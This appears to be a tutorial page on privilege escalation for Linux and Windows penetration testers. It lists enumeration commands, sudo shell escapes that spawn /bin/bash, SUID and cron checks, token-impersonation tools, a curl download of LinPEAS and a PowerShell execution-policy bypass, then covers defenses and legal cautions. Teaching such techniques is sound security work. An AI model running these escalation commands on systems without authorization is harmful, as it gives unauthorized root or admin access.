⬆️ Privilege Escalation

Comprehensive guide to privilege escalation techniques for Linux and Windows systems

🎯 What is Privilege Escalation?

⚡ Escalation Overview

The process of gaining higher-level permissions on a system than initially obtained through exploitation

🎭

Horizontal

Same privilege level, different user

⬆️

Vertical

Higher privilege level

🔐

Local

Single system escalation

🌐

Domain

Network-wide escalation

🐧 Linux Privilege Escalation

🔍 Linux Enumeration & Exploitation

Systematic approach to discovering and exploiting Linux privilege escalation vectors

🔍

System Enumeration

Information gathering

# Basic enumeration
whoami && id
uname -a
cat /etc/os-release
ps aux | grep root
ss -tulpn

User InfoKernel VersionRunning Services

🛡️

SUDO Exploitation

Privilege escalation via sudo

# Check sudo permissions
sudo -l
# Common sudo bypasses
sudo vim -c ':!/bin/bash'
sudo find / -exec /bin/bash \;

GTFOBinsSudo RulesCommand Injection

📁

File Permissions

SUID/SGID exploitation

# Find SUID/SGID binaries
find / -perm -4000 2>/dev/null
find / -perm -2000 2>/dev/null
# Writable files and directories
find / -writable 2>/dev/null

SUID BinariesWorld WritablePATH Hijacking

🔄

Cron Jobs

Scheduled task exploitation

# Check cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l
# Monitor process execution
pspy64

System CronUser CronWildcards

🪟 Windows Privilege Escalation

🪟 Windows Exploitation Techniques

Windows-specific privilege escalation methods and automated enumeration tools

🔍

System Information

Windows enumeration

# Basic enumeration
whoami /all
systeminfo
net user
net localgroup administrators
tasklist /svc

User PrivilegesOS VersionServices

🛠️

Service Exploitation

Unquoted service paths

# Check service permissions
sc query
wmic service get name,pathname,state
# PowerShell service enumeration
Get-WmiObject win32_service

Unquoted PathsDLL HijackingService Restart

🔑

Token Impersonation

Access token manipulation

# Check privileges
whoami /priv
# Common privilege escalation
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege

RottenPotatoJuicyPotatoPrintSpoofer

📋

Registry Analysis

Configuration exploitation

# Registry enumeration
reg query HKLM\Software\Policies
reg query HKCU\Software\Policies
# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

AlwaysInstallElevatedAutorunsCredentials

🤖 Automated Enumeration Tools

⚙️ Enumeration Scripts

Automated tools to quickly identify privilege escalation vectors on target systems

🐧 Linux Enumeration

# LinPEAS - Comprehensive enumeration
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
./linpeas.sh
# LinEnum - Alternative script
./LinEnum.sh -t

LinPEASLinEnumLinux Smart Enumeration

🪟 Windows Enumeration

# WinPEAS - Windows enumeration
winpeas.exe
# PowerUp - PowerShell script
powershell -ep bypass
. .\PowerUp.ps1; Invoke-AllChecks

WinPEASPowerUpPrivescCheck

🔍 Process Monitoring

# pspy - Monitor processes (Linux)
./pspy64
# procmon - Process Monitor (Windows)
procmon.exe
# PowerShell process monitoring
Get-WmiObject Win32_Process

pspyprocmonsysmon

🛡️ Advanced Techniques

🚀 Advanced Exploitation

Sophisticated techniques for experienced penetration testers and red team operators

🔧 Kernel Exploitation

CVE Research: Public vulnerability databases
Dirty COW: CVE-2016-5195 race condition
Local Exploits: Kernel module exploitation
Memory Corruption: Buffer overflow techniques

🎭 Container Escapes

Docker Breakouts: Privileged containers
Kubernetes Escapes: Pod security contexts
Namespace Isolation: Breaking container boundaries
Runtime Exploitation: Container runtime vulnerabilities

🌐 Domain Escalation

Kerberoasting: Service account attacks
ASREPRoasting: Pre-authentication disabled
DCSync: Domain controller replication
Golden Tickets: Persistence techniques

📚 Prevention & Defense

🛡️ Defensive Measures

Best practices to prevent privilege escalation attacks and maintain system security

🔒 System Hardening

Principle of Least Privilege: Minimal necessary permissions
Regular Updates: Patch management strategy
Service Removal: Disable unnecessary services
Secure Configuration: Follow security baselines

📊 Monitoring & Detection

Process Monitoring: Unusual process execution
File Integrity: Monitor critical system files
Privilege Changes: User permission modifications
Log Analysis: Security event correlation

🏗️ Architecture Security

Segmentation: Network and system isolation
Access Controls: Multi-factor authentication
Containers: Proper isolation and security contexts
Endpoint Protection: EDR and behavioral analysis

💡 Penetration Testing Tips

Always document findings: Keep detailed notes of successful escalation paths
Test multiple vectors: Don't stop at the first working method
Understand the impact: Know what level of access you've gained
Clean up afterwards: Remove any artifacts or modifications made during testing

⚠️ Legal and Ethical Considerations

Privilege escalation techniques should only be used during authorized penetration testing engagements or on systems you own. Unauthorized privilege escalation is illegal and can result in criminal charges.

🚨 Red Team Warning

When conducting red team operations, be extremely careful with privilege escalation techniques that could cause system instability or data loss. Always have a rollback plan and coordinate with the blue team.

📺 Video Tutorial